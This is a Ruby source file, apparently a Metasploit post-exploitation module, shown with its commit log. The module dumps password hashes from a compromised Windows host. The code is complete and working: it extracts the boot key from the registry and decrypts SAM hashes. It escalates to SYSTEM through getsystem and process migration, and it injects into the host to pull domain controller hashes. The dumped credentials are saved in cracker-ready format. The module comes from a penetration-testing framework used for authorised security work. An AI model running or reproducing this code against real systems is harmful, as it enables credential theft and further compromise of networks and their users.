624e19fd8b
Squashed commit of the following: commit 2f4e8df33c5b4baa8d6fd67b400778a3f93482aa Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 16:31:03 2012 -0700 Clean up some rdoc comments This adds categories for the various interfaces that meterpreter and shell sessions implement so they are grouped logically in the docs. commit 9d31bc1b35845f7279148412f49bda56a39c9d9d Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 13:00:25 2012 -0700 Combine the docs into one output dir There's really no need to separate the API sections into their own directory. Combining them makes it much easier to read. commit eadd7fc136a9e7e4d9652d55dfb86e6f318332e0 Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 08:27:22 2012 -0700 Keep the order of iface attributes the same accross rubies 1.8 doesn't maintain insertion order for Hash keys like 1.9 does so we end up with ~random order for the display with the previous technique. Switch to an Array instead of a Hash so it's always the same. commit 6f66dd40f39959711f9bacbda99717253a375d21 Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 08:23:35 2012 -0700 Fix a few more compiler warnings commit f39cb536a80c5000a5b9ca1fec5902300ae4b440 Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 08:17:39 2012 -0700 Fix a type-safety warning commit 1e52785f38146515409da3724f858b9603d19454 Author: James Lee <egypt@metasploit.com> Date: Mon Feb 27 15:21:36 2012 -0700 LHOST should be OptAddress, not OptAddressRange commit acef978aa4233c7bd0b00ef63646eb4da5457f67 Author: James Lee <egypt@metasploit.com> Date: Sun Feb 26 17:45:59 2012 -0700 Fix a couple of warnings and a typo commit 29d87f88790aa1b3e5db6df650ecfb3fb93c675b Author: HD Moore <hdm@digitaloffense.net> Date: Mon Feb 27 11:54:29 2012 -0600 Fix ctype vs content_type typo commit 83b5400356c47dd1973e6be3aa343084dfd09c73 Author: Gregory Man <man.gregory@gmail.com> Date: Sun Feb 26 15:38:33 2012 +0200 Fixed scripts/meterpreter/enum_firefox to work with firefox > 3.6.x commit 49c2c80b347820d02348d694cc71f1b3028b4365 Author: Steve Tornio <swtornio@gmail.com> Date: Sun Feb 26 07:13:13 2012 -0600 add osvdb ref commit e18e1fe97b89c3a2b8c22bc6c18726853d2c2bee Author: Matt Andreko <mandreko@gmail.com> Date: Sat Feb 25 18:02:56 2012 -0500 Added aspx target to msfvenom. This in turn added it to msfencode as well. Ref: https://github.com/rapid7/metasploit-framework/pull/188 Tested on winxp with IIS in .net 1.1 and 2.0 modes commit e6aa5072112d79bbf8a4d2289cf8d301db3932f5 Author: Joshua J. Drake <github.jdrake@qoop.org> Date: Sat Feb 25 13:00:48 2012 -0600 Fixes #6308: Fall back to 127.0.0.1 when SocketError is raised from the resolver commitb3371e8bfeAuthor: James Lee <egypt@metasploit.com> Date: Tue Feb 28 17:07:42 2012 -0700 Simplify logic for whether an inner iface has the same address commit5417419f35Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 16:58:16 2012 -0700 Whitespace commit9036875c29Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 16:53:45 2012 -0700 Set session info before worrying about address get_interfaces can take a while on Linux, grab uid and hostname earlier so we can give the user an idea of what they popped as soon as possible. commitf34b51c629Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 16:48:42 2012 -0700 Clean up rdoc commite61a066345Author: HD Moore <hd_moore@rapid7.com> Date: Tue Feb 28 04:54:45 2012 -0600 Ensure the architecture is only the first word (not the full WOW64 message in some cases) commit4c70161097Author: HD Moore <hd_moore@rapid7.com> Date: Tue Feb 28 04:49:17 2012 -0600 More paranoia code, just in case RHOST is set to whitespace commitc5ff89fe3dAuthor: HD Moore <hd_moore@rapid7.com> Date: Tue Feb 28 04:47:01 2012 -0600 A few more small bug fixes to handle cases with an empty string target host resulting in a bad address commit462d0188a1Author: HD Moore <hd_moore@rapid7.com> Date: Tue Feb 28 03:55:10 2012 -0600 Fix up the logic (reversed by accident) commit2b2b0adaecAuthor: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 23:29:52 2012 -0600 Automatically parse system information and populate the db, identify and report NAT when detected, show the real session_host in the sessions -l listing commit547a4ab4c6Author: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 22:16:03 2012 -0600 Fix typo introduced commit27a7b7961eAuthor: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 22:11:38 2012 -0600 More session.session_host tweaks commite447302a1aAuthor: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 22:08:20 2012 -0600 Additional tunnel_peer changes commit93369fcffaAuthor: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 22:06:21 2012 -0600 Additional changes to session.session_host commitc3552f66d1Author: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 22:00:19 2012 -0600 Merge changes into the new branch
490 lines
15 KiB
Ruby
490 lines
15 KiB
Ruby
##
|
|
# $Id$
|
|
##
|
|
|
|
##
|
|
# ## This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'rex'
|
|
require 'msf/core/post/common'
|
|
require 'msf/core/post/windows/priv'
|
|
require 'msf/core/post/windows/registry'
|
|
require 'msf/core/post/windows/accounts'
|
|
require 'msf/core/post/file'
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
include Msf::Post::Common
|
|
include Msf::Post::Windows::Priv
|
|
include Msf::Post::Windows::Registry
|
|
include Msf::Post::Windows::Accounts
|
|
include Msf::Auxiliary::Report
|
|
include Msf::Post::File
|
|
|
|
def initialize(info={})
|
|
super( update_info( info,
|
|
'Name' => 'Windows Gather Local and Domain Controller Account Password Hashes',
|
|
'Description' => %q{
|
|
This will dump local accounts from the SAM Database. If the target
|
|
host is a Domain Controller, it will dump the Domain Account Database using the proper
|
|
technique depending on privilege level, OS and role of the host.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
|
|
'Version' => '$Revision$',
|
|
'Platform' => [ 'windows' ],
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
))
|
|
register_options(
|
|
[
|
|
OptBool.new('GETSYSTEM', [ false, 'Attempt to get SYSTEM privilege on the target host.', false])
|
|
|
|
], self.class)
|
|
@smb_port = 445
|
|
# Constants for SAM decryption
|
|
@sam_lmpass = "LMPASSWORD\x00"
|
|
@sam_ntpass = "NTPASSWORD\x00"
|
|
@sam_qwerty = "!@\#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\x00"
|
|
@sam_numeric = "0123456789012345678901234567890123456789\x00"
|
|
@sam_empty_lm = ["aad3b435b51404eeaad3b435b51404ee"].pack("H*")
|
|
@sam_empty_nt = ["31d6cfe0d16ae931b73c59d7e0c089c0"].pack("H*")
|
|
|
|
@des_odd_parity = [
|
|
1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
|
|
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
|
|
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
|
|
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
|
|
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
|
|
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
|
|
97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
|
|
112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
|
|
128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
|
|
145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
|
|
161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
|
|
176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
|
|
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
|
|
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
|
|
224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
|
|
241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
|
|
]
|
|
end
|
|
|
|
# Run Method for when run command is issued
|
|
def run
|
|
print_status("Running module against #{sysinfo['Computer']}")
|
|
host = Rex::FileUtils.clean_path(sysinfo["Computer"])
|
|
hash_file = store_loot("windows.hashes", "text/plain", session, "", "#{host}_hashes.txt", "Windows Hashes")
|
|
print_status("Hashes will be saved to the database if one is connected.")
|
|
print_status("Hashes will be saved in loot in JtR password file format to:")
|
|
print_status(hash_file)
|
|
smart_hash_dump(datastore['GETSYSTEM'], hash_file)
|
|
end
|
|
|
|
|
|
def capture_boot_key
|
|
bootkey = ""
|
|
basekey = "System\\CurrentControlSet\\Control\\Lsa"
|
|
%W{JD Skew1 GBG Data}.each do |k|
|
|
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
|
|
return nil if not ok
|
|
bootkey << [ok.query_class.to_i(16)].pack("V")
|
|
ok.close
|
|
end
|
|
|
|
keybytes = bootkey.unpack("C*")
|
|
descrambled = ""
|
|
# descrambler = [ 0x08, 0x05, 0x04, 0x02, 0x0b, 0x09, 0x0d, 0x03, 0x00, 0x06, 0x01, 0x0c, 0x0e, 0x0a, 0x0f, 0x07 ]
|
|
descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
|
|
|
|
0.upto(keybytes.length-1) do |x|
|
|
descrambled << [ keybytes[ descrambler[x] ] ].pack("C")
|
|
end
|
|
|
|
|
|
descrambled
|
|
end
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def capture_hboot_key(bootkey)
|
|
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account", KEY_READ)
|
|
return if not ok
|
|
vf = ok.query_value("F")
|
|
return if not vf
|
|
vf = vf.data
|
|
ok.close
|
|
|
|
hash = Digest::MD5.new
|
|
hash.update(vf[0x70, 16] + @sam_qwerty + bootkey + @sam_numeric)
|
|
|
|
rc4 = OpenSSL::Cipher::Cipher.new("rc4")
|
|
rc4.key = hash.digest
|
|
hbootkey = rc4.update(vf[0x80, 32])
|
|
hbootkey << rc4.final
|
|
return hbootkey
|
|
end
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def capture_user_keys
|
|
users = {}
|
|
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users", KEY_READ)
|
|
return if not ok
|
|
|
|
ok.enum_key.each do |usr|
|
|
uk = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\#{usr}", KEY_READ)
|
|
next if usr == 'Names'
|
|
users[usr.to_i(16)] ||={}
|
|
users[usr.to_i(16)][:F] = uk.query_value("F").data
|
|
users[usr.to_i(16)][:V] = uk.query_value("V").data
|
|
uk.close
|
|
end
|
|
ok.close
|
|
|
|
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\Names", KEY_READ)
|
|
ok.enum_key.each do |usr|
|
|
uk = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\Names\\#{usr}", KEY_READ)
|
|
r = uk.query_value("")
|
|
rid = r.type
|
|
users[rid] ||= {}
|
|
users[rid][:Name] = usr
|
|
uk.close
|
|
end
|
|
ok.close
|
|
users
|
|
end
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def decrypt_user_keys(hbootkey, users)
|
|
users.each_key do |rid|
|
|
user = users[rid]
|
|
|
|
hashlm_off = nil
|
|
hashnt_off = nil
|
|
hashlm_enc = nil
|
|
hashnt_enc = nil
|
|
|
|
hoff = user[:V][0x9c, 4].unpack("V")[0] + 0xcc
|
|
|
|
# Lanman and NTLM hash available
|
|
if(hoff + 0x28 < user[:V].length)
|
|
hashlm_off = hoff + 4
|
|
hashnt_off = hoff + 24
|
|
hashlm_enc = user[:V][hashlm_off, 16]
|
|
hashnt_enc = user[:V][hashnt_off, 16]
|
|
# No stored lanman hash
|
|
elsif (hoff + 0x14 < user[:V].length)
|
|
hashnt_off = hoff + 8
|
|
hashnt_enc = user[:V][hashnt_off, 16]
|
|
hashlm_enc = ""
|
|
# No stored hashes at all
|
|
else
|
|
hashnt_enc = hashlm_enc = ""
|
|
end
|
|
user[:hashlm] = decrypt_user_hash(rid, hbootkey, hashlm_enc, @sam_lmpass)
|
|
user[:hashnt] = decrypt_user_hash(rid, hbootkey, hashnt_enc, @sam_ntpass)
|
|
end
|
|
|
|
users
|
|
end
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def convert_des_56_to_64(kstr)
|
|
key = []
|
|
str = kstr.unpack("C*")
|
|
|
|
key[0] = str[0] >> 1
|
|
key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2)
|
|
key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3)
|
|
key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4)
|
|
key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5)
|
|
key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6)
|
|
key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7)
|
|
key[7] = str[6] & 0x7F
|
|
|
|
0.upto(7) do |i|
|
|
key[i] = ( key[i] << 1)
|
|
key[i] = @des_odd_parity[key[i]]
|
|
end
|
|
|
|
key.pack("C*")
|
|
end
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def rid_to_key(rid)
|
|
|
|
s1 = [rid].pack("V")
|
|
s1 << s1[0,3]
|
|
|
|
s2b = [rid].pack("V").unpack("C4")
|
|
s2 = [s2b[3], s2b[0], s2b[1], s2b[2]].pack("C4")
|
|
s2 << s2[0,3]
|
|
|
|
[convert_des_56_to_64(s1), convert_des_56_to_64(s2)]
|
|
end
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def decrypt_user_hash(rid, hbootkey, enchash, pass)
|
|
|
|
if(enchash.empty?)
|
|
case pass
|
|
when @sam_lmpass
|
|
return @sam_empty_lm
|
|
when @sam_ntpass
|
|
return @sam_empty_nt
|
|
end
|
|
return ""
|
|
end
|
|
|
|
des_k1, des_k2 = rid_to_key(rid)
|
|
|
|
d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
|
|
d1.padding = 0
|
|
d1.key = des_k1
|
|
|
|
d2 = OpenSSL::Cipher::Cipher.new('des-ecb')
|
|
d2.padding = 0
|
|
d2.key = des_k2
|
|
|
|
md5 = Digest::MD5.new
|
|
md5.update(hbootkey[0,16] + [rid].pack("V") + pass)
|
|
|
|
rc4 = OpenSSL::Cipher::Cipher.new('rc4')
|
|
rc4.key = md5.digest
|
|
okey = rc4.update(enchash)
|
|
|
|
d1o = d1.decrypt.update(okey[0,8])
|
|
d1o << d1.final
|
|
|
|
d2o = d2.decrypt.update(okey[8,8])
|
|
d1o << d2.final
|
|
d1o + d2o
|
|
end
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def read_hashdump
|
|
host,port = session.session_host, session.session_port
|
|
collected_hashes = ""
|
|
begin
|
|
|
|
print_status("\tObtaining the boot key...")
|
|
bootkey = capture_boot_key
|
|
|
|
print_status("\tCalculating the hboot key using SYSKEY #{bootkey.unpack("H*")[0]}...")
|
|
hbootkey = capture_hboot_key(bootkey)
|
|
|
|
print_status("\tObtaining the user list and keys...")
|
|
users = capture_user_keys
|
|
|
|
print_status("\tDecrypting user keys...")
|
|
users = decrypt_user_keys(hbootkey, users)
|
|
|
|
print_status("\tDumping password hashes...")
|
|
|
|
users.keys.sort{|a,b| a<=>b}.each do |rid|
|
|
# next if guest account or support account
|
|
next if rid == 501 or rid == 1001
|
|
collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
|
|
print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
|
|
session.framework.db.report_auth_info(
|
|
:host => host,
|
|
:port => @smb_port,
|
|
:sname => 'smb',
|
|
:user => users[rid][:Name],
|
|
:pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
|
|
:type => "smb_hash"
|
|
)
|
|
end
|
|
|
|
|
|
rescue ::Interrupt
|
|
raise $!
|
|
rescue ::Rex::Post::Meterpreter::RequestError => e
|
|
print_error("Meterpreter Exception: #{e.class} #{e}")
|
|
print_error("This module requires the use of a SYSTEM user context (hint: migrate into service process)")
|
|
rescue ::Exception => e
|
|
print_error("Error: #{e.class} #{e} #{e.backtrace}")
|
|
end
|
|
return collected_hashes
|
|
end
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def inject_hashdump
|
|
collected_hashes = ""
|
|
host,port = session.session_host, session.session_port
|
|
# Load priv extension
|
|
session.core.use("priv")
|
|
# dump hashes
|
|
session.priv.sam_hashes.each do |h|
|
|
returned_hash = h.to_s.split(":")
|
|
if returned_hash[1] == "j"
|
|
returned_hash.delete_at(1)
|
|
end
|
|
rid = returned_hash[1].to_i
|
|
|
|
# Skip the Guest Account
|
|
next if rid == 501 or rid == 1001
|
|
|
|
# skip if it returns nil for an entry
|
|
next if h == nil
|
|
begin
|
|
user = returned_hash[0].scan(/^[a-zA-Z0-9\-$.]*/).join.gsub(/\.$/,"")
|
|
lmhash = returned_hash[2].scan(/[a-f0-9]*/).join
|
|
next if lmhash == nil
|
|
hash_entry = "#{user}:#{rid}:#{lmhash}:#{returned_hash[3]}"
|
|
collected_hashes << "#{hash_entry}\n"
|
|
print_good("\t#{hash_entry}")
|
|
session.framework.db.report_auth_info(
|
|
:host => host,
|
|
:port => @smb_port,
|
|
:sname => 'smb',
|
|
:user => user,
|
|
:pass => "#{lmhash}:#{returned_hash[3]}",
|
|
:type => "smb_hash"
|
|
)
|
|
rescue
|
|
next
|
|
end
|
|
end
|
|
return collected_hashes
|
|
end
|
|
#-------------------------------------------------------------------------------
|
|
|
|
# Function for checking if target is a DC
|
|
def is_dc?
|
|
is_dc_srv = false
|
|
serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
|
|
if registry_enumkeys(serviceskey).include?("NTDS")
|
|
if registry_enumkeys(serviceskey + "\\NTDS").include?("Parameters")
|
|
print_good("\tThis host is a Domain Controller!")
|
|
is_dc_srv = true
|
|
end
|
|
end
|
|
return is_dc_srv
|
|
end
|
|
#-------------------------------------------------------------------------------
|
|
|
|
# Function to migrate to a process running as SYSTEM
|
|
def move_to_sys
|
|
# Make sure you got the correct SYSTEM Account Name no matter the OS Language
|
|
local_sys = resolve_sid("S-1-5-18")
|
|
system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
|
|
|
|
# Processes that can Blue Screen a host if migrated in to
|
|
dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
|
|
|
|
print_status("Migrating to process owned by SYSTEM")
|
|
session.sys.process.processes.each do |p|
|
|
|
|
# Check we are not migrating to a process that can BSOD the host
|
|
next if dangerous_processes.include?(p["name"])
|
|
|
|
next if p["pid"] == session.sys.process.getpid
|
|
|
|
if p["user"] == system_account_name
|
|
print_status("Migrating to #{p["name"]}")
|
|
session.core.migrate(p["pid"])
|
|
print_good("Successfully migrated to #{p["name"]}")
|
|
return
|
|
end
|
|
end
|
|
end
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def smart_hash_dump(migrate_system, pwdfile)
|
|
domain_controler = is_dc?
|
|
if not is_uac_enabled? or is_admin?
|
|
print_status("Dumping password hashes...")
|
|
# Check if Running as SYSTEM
|
|
if is_system?
|
|
# For DC's the registry read method does not work.
|
|
if domain_controler
|
|
begin
|
|
file_local_write(pwdfile,inject_hashdump)
|
|
rescue::Exception => e
|
|
print_error("Failed to dump hashes as SYSTEM, trying to migrate to another process")
|
|
|
|
if sysinfo['OS'] =~ /(Windows 2008)/i
|
|
move_to_sys
|
|
file_local_write(pwdfile,inject_hashdump)
|
|
else
|
|
print_error("Could not get NTDS hashes!")
|
|
end
|
|
end
|
|
|
|
# Check if not DC
|
|
else
|
|
print_status "Running as SYSTEM extracting hashes from registry"
|
|
file_local_write(pwdfile,read_hashdump)
|
|
end
|
|
|
|
# Check if not running as SYSTEM
|
|
else
|
|
|
|
# Check if Domain Controller
|
|
if domain_controler
|
|
begin
|
|
file_local_write(pwdfile,inject_hashdump)
|
|
rescue
|
|
if migrate_system
|
|
print_status("Trying to get SYSTEM privilege")
|
|
results = session.priv.getsystem
|
|
if results[0]
|
|
print_good("Got SYSTEM privilege")
|
|
if session.sys.config.sysinfo['OS'] =~ /(Windows 2008)/i
|
|
# Migrate process since on Windows 2008 R2 getsystem
|
|
# does not set certain privilege tokens required to
|
|
# inject and dump the hashes.
|
|
move_to_sys
|
|
end
|
|
file_local_write(pwdfile,inject_hashdump)
|
|
else
|
|
print_error("Could not obtain SYSTEM privileges")
|
|
end
|
|
else
|
|
print_error("Could not get NTDS hashes!")
|
|
end
|
|
|
|
end
|
|
elsif sysinfo['OS'] =~ /(Windows 7|2008|Vista)/i
|
|
if migrate_system
|
|
print_status("Trying to get SYSTEM privilege")
|
|
results = session.priv.getsystem
|
|
if results[0]
|
|
print_good("Got SYSTEM privilege")
|
|
file_local_write(pwdfile,read_hashdump)
|
|
else
|
|
print_error("Could not obtain SYSTEM privilege")
|
|
end
|
|
else
|
|
print_error("On this version of Windows you need to be NT AUTHORITY\\SYSTEM to dump the hashes")
|
|
print_error("Try setting GETSYSTEM to true.")
|
|
end
|
|
|
|
else
|
|
if migrate_system
|
|
print_status("Trying to get SYSTEM privilege")
|
|
results = session.priv.getsystem
|
|
if results[0]
|
|
print_good("Got SYSTEM privilege")
|
|
file_local_write(pwdfile,read_hashdump)
|
|
else
|
|
print_error("Could not obtain SYSTEM privileges")
|
|
end
|
|
else
|
|
file_local_write(pwdfile,inject_hashdump)
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
else
|
|
print_error("Insufficient privileges to dump hashes!")
|
|
end
|
|
end
|
|
end
|